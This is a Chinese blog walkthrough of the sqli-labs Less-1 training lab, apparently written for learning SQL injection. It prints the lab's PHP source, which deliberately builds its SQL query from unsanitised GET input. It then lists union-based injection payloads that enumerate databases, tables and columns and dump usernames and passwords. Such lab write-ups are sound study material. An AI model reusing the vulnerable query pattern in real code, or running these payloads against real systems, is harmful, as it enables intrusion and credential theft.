sqli-labs:less-1(字符型报错注入)

最新推荐文章于 2023-07-16 14:29:51 发布
最新推荐文章于 2023-07-16 14:29:51 发布
阅读量155 收藏
点赞数
分类专栏: SQL注入 文章标签: mysql CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42702981/article/details/118674774
版权 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables 
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>





 

id=1
id=1 and 1=1(正常)
id=1 and 1=2(正常)所以判断不是数字型
id=1'(报差)
id=1'--+(正常)
id=1' or '1'='1(正常)所以是字符型
id=1' and '1'='2(报错)
id=1' order by 1--+
id=1' order by 2--+
id=1' order by 3--+
id=1' order by 4--+(查无此列)

id=-1' union select 1,2,3--(返回2,3)
id=-1' union select 1,user(),database()--查当前数据库
id=-1' union select 1,2,group_concaat(schema_name) from information_schema.schemata--(查看所有数据库)
id=-1' union select 1,2 ,group_concat(table_name) from information_schema.tables --(查表)
id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where (查列名)table_name='users'--
id=-1' union select 1,2,group_concat(id,username,password)from users--(查内容)

~羽~.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入学习—sqlilabs环境搭建以及代码审计(1—10关代码详解)持续更新1-65关
qq_53717877的博客
10-13 712
目录 环境搭建 SQL注入概念讲解 代码审计 Less1: 源码讲解 Less2 源码讲解 Less3 源码讲解 Less4 源码讲解 Less5 源码讲解 Less6 源码讲解 Less7 源码讲解 Less8 源码讲解 Less9 源码讲解 Less10 源码讲解 环境搭建 Github上直接搜索sqli-labs直接会有源码,php、asp版本的都有,我这是使用的一个php经典版本,sql注入必备 Github链接:https://gith...
sqli abs Less-1详解
weixin_43713000的博客
01-25 473
SQL 注入靶场 Sqli labs SQLI-LABS是一个开源靶机; 它将sql注入分为了 basic基本、advanced进阶、stacked堆叠注入、challenges挑战 四个等级; 含有60余个sql注入关卡,较全面的收纳了get及post包下的各类sql注入 方式环境 Less-1 Error Based- String GET - Error based - Single quotes - String (基于错误的GET单引号字符注入) 第一关是基于字符串的单引号错误 首先在链.
sqli-lab笔记--less01 (Error Based- String)
TYW168168的博客
10-17 397
      sqli-lab less01--Error Based- String(基于字符串错误)  (第1节:基于错误 – 字符串)   字符注入,也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住   TEST   http://127.0.0.1/sqli/Less-1/?id=1'   提示语法错误:           ...
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 942
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
【网安自学/web漏洞-day01】sqli-labs第一关
加油~
05-05 1255
Less-1 **Error Based- String** 原sql为 select * from users where id=1; 判断是否为字符注入 select * form users where id=1’ 若界面改变则为字符注入,猜列名的数量:select * from users where id=1' order by 5--+ (可以使用二分法进行) ;若为5的时候界面错误,4的时候界面不会报错了说明有三列 猜显示的位置: select * from users whe..
SQLI-LAB  的 实战记录(Less 1 - Less 10)
这块盾牌有待改良
07-15 3302
Less - 1 Error Based- String Less - 2 Error Based- Intiger Less - 3 Error Based- String with Twist
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
实验吧——加了料的报错注入-wp
fzykn06的博客
04-10 244
题目链接: http://ctf5.shiyanbar.com/web/baocuo/index.php 在这题试过挺多种方法,最终网上学了两种方法,分别是extractvalue()报错注入和updatexml()报错注入,两种方法感觉都不错,但是两个都会被长度限制,最长是32位。 有题目可以看出是用post来传递参数, 构造post参数测试尝试一下直接注入:username=1’ &amp...
csdn博客登录不上-why?
hudashuai的博客
01-11 1543
  标题距离上篇博客已有三月之余,今天登录csdn才发现登录成功之后,立马又退回了登录界面,试了好几次也是如此,然后试着用手机号免密登录也是如此。注册账号有一年左右了,没有更换过密码,还记得在注册的时候看他有提示过要定期更换密码,自己就试了试更改密码,登录成功了,原来是太长时间没有修改密码导致的。 修改方式主要有两种方式: 手机号注册,邮箱未绑定。可通过短信验证码验证登录。 绑定邮箱,可通过邮箱...
sqli-labs-master第一关Less-1Error based - Single quotes - String
weixin_45492475的博客
08-19 344
sqli-labs-master第一关Less-1Error based - Single quotes - String 一、首先进入目标网站,查看显示输入正确时的页面 根据下面提示,输入id值,当我们输入?id=1时得到了一个正确的返回界面 二、判断注入点 1、?id=1’ 判断注入点处是数字还是字符,在正确语句后加入一个单引号后,发现报错信息为 ‘‘1’’ LIMIT 0,1’ at...
SQLi-Labs 学习笔记(Less 1-10)
Onlyme的博客
03-11 1万+
点击打开链接http://blog.csdn.net/u012763794/article/details/51207833http://blog.csdn.net/u012763794/article/details/51361152http://blog.csdn.net/u012763794/article/details/51457142Less-1 基于错误的 - get 单引号 - 字...
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入)
weixin_44368248的博客
04-14 616
1.根据图中的提示在url上加上?id=1 2.输入单引号,发现页面报错(通过在url中修改对应的id值。为正常数字、大数字、字符、(单引号、双引号、双单引号、括号)、反斜杆来探测url是否存在注入点) 由报错信息可知,可以通过单引号闭合 3.通过order by +数字来判断当前的字段数,输入order by 10报错,输入order by 5还报错,输入order by 3没有报错,在输入or...
Mysql-error code汇总
热门推荐
文学超的博客
07-03 5万+
OS error code 1: Operation not permitted OS error code 2: No such file or directory OS error code 3: No such process OS error code 4: Interrupted system call OS error code 5: In
SQLI-LAB  的 实战记录(Less 11 - Less 20)
这块盾牌有待改良
07-15 4309
Less - 11 Error Based- String Less - 12 Error Based- Double quotes- String Less - 13 Double Injection- String- with twist
GET-ERROR based-Single quotes – String (GET基于错误的单引号字符注入) Less-1
water0diamond的博客
03-12 919
关于数据库的一些基础,会在前一篇提前准备篇中提到 首先打开网站首页,会发现如下界面:显示请输入id作为带数值的参数,那么下一步,我们就可以将参数传入试着提交然后看会有什么返回值。 使用get方式提交id参数,这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。 然后再测id类是否为字符串,用单引号测试,出现‘’’说明id为字符串类 那么下面我们试着添加...
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值